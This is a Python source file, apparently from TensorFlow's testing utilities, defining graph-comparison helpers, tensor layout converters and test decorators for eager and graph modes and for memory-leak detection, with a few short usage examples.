def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
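# Example (illustrative sketch): two graphs built the same way compare equal
# under assert_equal_graph_def; node names must match between the graphs.
def _example_assert_equal_graph_def():
  def build():
    g = ops.Graph()
    with g.as_default():
      array_ops.placeholder(dtypes.float32, shape=[2, 2], name="input")
    return g.as_graph_def()
  # Raises AssertionError if the GraphDefs differ (node ordering is ignored).
  assert_equal_graph_def(build(), build())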
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return pywrap_tensorflow.IsBuiltWithROCm()
def GpuSupportsHalfMatMulAndConv():
return pywrap_tensorflow.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
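# Example (illustrative): NHWCToNCHW also accepts a plain shape list, which
# makes the axis reordering easy to see without building a tensor.
def _example_nhwc_to_nchw_shape():
  # [batch, height, width, channels] -> [batch, channels, height, width]
  assert NHWCToNCHW([32, 224, 224, 3]) == [32, 3, 224, 224]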
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
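# Example (illustrative): the NHWC -> NCHW_VECT_C shape transform splits the
# channel dimension into channels // 4 plus a trailing vector dimension of 4.
def _example_nhwc_to_nchw_vect_c_shape():
  # [batch, height, width, channels=8] -> [batch, 2, height, width, 4]
  assert NHWCToNCHW_VECT_C([32, 224, 224, 8]) == [32, 2, 224, 224, 4]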
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in an "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
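# Example (illustrative sketch): skipping a test body when a condition holds.
# The environment variable name below is hypothetical, chosen only for the
# example. Note that skip_if simply returns None instead of reporting a skip,
# so the body silently does not run when the condition is true.
class _ExampleSkipIfTest(googletest.TestCase):

  @skip_if(lambda: os.environ.get("EXAMPLE_SKIP_SLOW_TESTS") == "1")
  def test_possibly_skipped(self):
    self.assertEqual(2, 1 + 1)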
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, *args, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, *args, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
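# Example (illustrative sketch): a leak-free eager test body should pass under
# assert_no_new_pyobjects_executing_eagerly, since nothing created inside the
# body outlives it once the garbage collector runs.
class _ExampleNoNewPyobjectsTest(googletest.TestCase):

  @assert_no_new_pyobjects_executing_eagerly
  def test_no_leaked_objects(self):
    for _ in range(10):
      # Temporary lists are dropped at the end of each iteration.
      _ = [i * i for i in range(100)]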
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
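# Example (illustrative): a worked expansion of _combine_named_parameters.
# Given mode=["graph", "eager"] and use_gpu=True, the helper above returns one
# OrderedDict per combination, treating the scalar option as a single choice:
#   [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#    OrderedDict([("mode", "eager"), ("use_gpu", True)])]
def _example_combine_named_parameters():
  return _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)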
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
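# Example (illustrative sketch): feeding the generated combinations to absl's
# parameterized.named_parameters, which requires the "testcase_name" key that
# this helper appends. The option names and values are arbitrary.
class _ExampleCombinationsTest(parameterized.TestCase):

  @parameterized.named_parameters(
      *generate_combinations_with_testcase_name(
          mode=["graph", "eager"], use_gpu=[False, True]))
  def test_combination(self, mode, use_gpu):
    self.assertIn(mode, ("graph", "eager"))
    self.assertIsInstance(use_gpu, bool)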
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
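# Example (illustrative sketch): forcing a legacy graph-mode body even when
# TF 2.x behavior is enabled; inside the decorated method, ops build a graph
# instead of executing eagerly, so placeholders are usable.
class _ExampleDeprecatedGraphModeTest(googletest.TestCase):

  @run_deprecated_v1
  def test_builds_graph(self):
    x = array_ops.placeholder(dtypes.float32, shape=[3])
    self.assertFalse(context.executing_eagerly())
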